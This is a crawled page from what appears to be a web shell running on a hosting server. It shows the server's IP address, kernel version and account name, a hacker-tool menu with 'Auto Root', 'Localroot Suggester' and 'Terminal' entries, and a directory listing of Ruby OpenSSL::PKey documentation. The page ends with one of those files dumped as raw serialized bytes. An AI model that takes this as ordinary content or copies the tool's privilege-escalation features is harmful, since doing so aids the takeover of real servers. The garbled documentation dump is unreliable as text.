Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
ri /
system /
OpenSSL /
PKey /
Delete
Unzip
Name
Size
Permission
Date
Action
DH
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
DHError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
DSA
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
DSAError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
EC
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
ECError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
PKey
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
PKeyError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
RSA
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
RSAError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
cdesc-PKey.ri
3.82
KB
-rw-r--r--
2024-06-26 17:25
generate_key-c.ri
1.19
KB
-rw-r--r--
2024-06-26 17:25
generate_parameters-c.ri
1.21
KB
-rw-r--r--
2024-06-26 17:25
read-c.ri
1016
B
-rw-r--r--
2024-06-26 17:25
Save
Rename
U:RDoc::AnyMethod[iI"generate_parameters:ETI"'OpenSSL::PKey::generate_parameters;TT:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [ I"NGenerates new parameters for the algorithm. _algo_name_ is a String that ;TI"Nrepresents the algorithm. The optional argument _options_ is a Hash that ;TI"Ospecifies the options specific to the algorithm. The order of the options ;TI"can be important.;To:RDoc::Markup::BlankLine o; ; [I"NA block can be passed optionally. The meaning of the arguments passed to ;TI"Rthe block varies depending on the implementation of the algorithm. The block ;TI"Emay be called once or multiple times, or may not even be called.;T@o; ; [I"PFor the supported options, see the documentation for the 'openssl genpkey' ;TI"utility command.;T@S:RDoc::Markup::Heading: leveli: textI"Example;To:RDoc::Markup::Verbatim; [I"Rpkey = OpenSSL::PKey.generate_parameters("DSA", "dsa_paramgen_bits" => 2048) ;TI"p pkey.p.num_bits #=> 2048;T:@format0: @fileI"ext/openssl/ossl_pkey.c;T:0@omit_headings_from_table_of_contents_below0I"FOpenSSL::PKey.generate_parameters(algo_name [, options]) -> pkey ;T0[ I"(*args);T@!FI" PKey;TcRDoc::NormalModule00